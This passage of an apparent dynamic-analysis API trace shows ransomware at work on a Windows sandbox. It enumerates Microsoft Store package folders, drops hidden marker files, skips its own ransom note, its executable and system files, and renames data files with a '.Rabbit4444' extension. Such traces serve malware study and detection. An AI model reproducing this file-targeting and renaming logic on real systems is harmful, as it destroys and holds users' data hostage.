lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\SystemAppData" [0062.660] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122f98 | out: hHeap=0xe0000) returned 1 [0062.660] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122100 | out: hHeap=0xe0000) returned 1 [0062.660] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\SystemAppData" [0062.660] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\SystemAppData\\" [0062.660] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0062.660] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0062.662] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.664] FlushFileBuffers (hFile=0x298) returned 1 [0062.665] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.665] CloseHandle (hObject=0x298) returned 1 [0062.666] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\SystemAppData") returned 89 [0062.666] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.666] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef652437, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xef652437, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xeeacbeea, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0062.666] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.666] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.666] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.666] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.666] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef652437, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xef652437, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xeeacbeea, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.666] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.666] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.666] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.666] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.666] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.666] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeeacbeea, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeeacbeea, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeeacbeea, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.666] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.666] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.666] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeeacbeea, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeeacbeea, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeeacbeea, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.666] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0062.666] lstrcpyW (in: lpString1=0x130ebec, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.666] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0062.667] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0062.667] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.668] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.668] CloseHandle (hObject=0x27c) returned 1 [0062.668] CloseHandle (hObject=0x298) returned 1 [0062.668] GetCurrentThreadId () returned 0xd98 [0062.668] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122268 [0062.668] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings" [0062.668] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123d48 | out: hHeap=0xe0000) returned 1 [0062.668] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122260 | out: hHeap=0xe0000) returned 1 [0062.668] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings" [0062.668] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\" [0062.668] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" [0062.668] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0062.671] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.674] FlushFileBuffers (hFile=0x298) returned 1 [0062.675] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.675] CloseHandle (hObject=0x298) returned 1 [0062.675] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings") returned 84 [0062.675] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.675] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40bd2b0, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x7138b2cd, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xeeacbeea, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0062.676] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.676] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.676] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.676] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.676] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40bd2b0, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x7138b2cd, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xeeacbeea, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.676] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.676] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.676] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.676] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.676] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.676] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeeacbeea, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeeacbeea, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeeaf211c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.676] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.676] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.676] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4109748, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4109748, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x4109748, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0062.676] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.676] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.676] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0062.676] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0062.676] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0062.676] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0062.676] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0062.676] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0062.676] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0062.676] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0062.676] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0062.676] lstrcpyW (in: lpString1=0x130ebe2, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0062.676] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0062.677] lstrlenW (lpString="roaming.lock") returned 12 [0062.677] lstrlenW (lpString="Rabbit4444") returned 10 [0062.677] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0062.677] lstrlenW (lpString=".dll") returned 4 [0062.677] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0062.677] lstrlenW (lpString=".lnk") returned 4 [0062.677] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0062.677] lstrlenW (lpString=".ini") returned 4 [0062.677] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0062.677] lstrlenW (lpString=".sys") returned 4 [0062.677] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0062.677] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40e351b, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1984b4a8, ftLastAccessTime.dwHighDateTime=0x1d336e0, ftLastWriteTime.dwLowDateTime=0x1984b4a8, ftLastWriteTime.dwHighDateTime=0x1d336e0, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0062.677] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.677] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.677] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0062.677] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0062.677] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0062.677] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0062.677] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0062.677] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0062.677] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0062.677] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0062.677] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0062.677] lstrcpyW (in: lpString1=0x130ebe2, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0062.677] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0062.678] lstrlenW (lpString="settings.dat") returned 12 [0062.678] lstrlenW (lpString="Rabbit4444") returned 10 [0062.678] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0062.678] lstrlenW (lpString=".dll") returned 4 [0062.678] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0062.678] lstrlenW (lpString=".lnk") returned 4 [0062.678] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0062.678] lstrlenW (lpString=".ini") returned 4 [0062.678] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0062.678] lstrlenW (lpString=".sys") returned 4 [0062.678] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0062.678] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.679] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0062.679] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15398944338) returned 1 [0062.679] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=16384) returned 1 [0062.679] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0062.679] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0062.679] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4300, lpName=0x0) returned 0x260 [0062.680] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4300) returned 0x70000 [0062.682] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x122f98 [0062.682] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0062.682] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122f98 | out: hHeap=0xe0000) returned 1 [0062.682] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0062.682] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x122f98 [0062.682] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0062.682] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122f98 | out: hHeap=0xe0000) returned 1 [0062.682] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0062.682] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15399309380) returned 1 [0062.682] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0062.682] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0062.682] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.683] CloseHandle (hObject=0x260) returned 1 [0062.683] CloseHandle (hObject=0x27c) returned 1 [0062.683] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444") returned 108 [0062.683] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0062.684] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x87e78d6e, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0x87e78d6e, ftLastAccessTime.dwHighDateTime=0x1d32716, ftLastWriteTime.dwLowDateTime=0x87e78d6e, ftLastWriteTime.dwHighDateTime=0x1d32716, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0062.684] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.684] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.684] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="Rabbit4444.exe") returned 1 [0062.684] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".") returned 1 [0062.684] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="..") returned 1 [0062.684] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="windows") returned -1 [0062.684] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="bootmgr") returned 1 [0062.684] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="pagefile.sys") returned 1 [0062.684] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="boot") returned 1 [0062.684] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="ids.txt") returned 1 [0062.684] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="NTUSER.DAT") returned 1 [0062.684] lstrcpyW (in: lpString1=0x130ebe2, lpString2="settings.dat.LOG1" | out: lpString1="settings.dat.LOG1") returned="settings.dat.LOG1" [0062.684] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1", dwFileAttributes=0x22) returned 1 [0062.685] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1", dwFileAttributes=0x6) returned 1 [0062.685] lstrlenW (lpString="settings.dat.LOG1") returned 17 [0062.685] lstrlenW (lpString="Rabbit4444") returned 10 [0062.685] lstrcmpiW (lpString1="s.dat.LOG1", lpString2="Rabbit4444") returned 1 [0062.685] lstrlenW (lpString=".dll") returned 4 [0062.685] lstrcmpiW (lpString1="LOG1", lpString2=".dll") returned 1 [0062.685] lstrlenW (lpString=".lnk") returned 4 [0062.685] lstrcmpiW (lpString1="LOG1", lpString2=".lnk") returned 1 [0062.685] lstrlenW (lpString=".ini") returned 4 [0062.685] lstrcmpiW (lpString1="LOG1", lpString2=".ini") returned 1 [0062.685] lstrlenW (lpString=".sys") returned 4 [0062.685] lstrcmpiW (lpString1="LOG1", lpString2=".sys") returned 1 [0062.685] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\settings\\settings.dat.log1"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.685] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0062.685] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15399624227) returned 1 [0062.686] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=16384) returned 1 [0062.686] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0062.686] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0062.686] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4300, lpName=0x0) returned 0x260 [0062.687] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4300) returned 0x70000 [0062.688] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x122f98 [0062.688] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0062.688] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122f98 | out: hHeap=0xe0000) returned 1 [0062.688] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0062.688] RtlAllocateHeap 